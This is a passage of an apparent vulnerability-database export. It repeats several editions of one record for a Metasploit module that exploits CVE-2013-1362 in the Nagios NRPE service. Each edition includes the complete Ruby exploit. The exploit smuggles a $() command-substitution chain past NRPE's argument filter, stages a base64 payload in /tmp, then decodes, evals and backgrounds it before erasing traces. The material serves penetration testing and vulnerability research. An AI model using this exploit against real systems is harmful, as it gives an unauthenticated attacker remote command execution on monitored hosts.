Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-16T13:54:55", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-16T13:54:55"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-16T13:54:55", "differentElements": ["modified", "published"], "edition": 49}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-17T11:49:13", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-17T11:49:13"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-17T11:49:13", "differentElements": ["modified", "published"], "edition": 50}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-17T13:47:51", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-17T13:47:51", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-17T13:47:51", "differentElements": ["modified", "published"], "edition": 51}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-19T19:54:05", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-19T19:54:05", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-19T19:54:05", "differentElements": ["modified", "published"], "edition": 52}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-19T21:56:07", "history": [], "viewCount": 82, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-19T21:56:07", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use 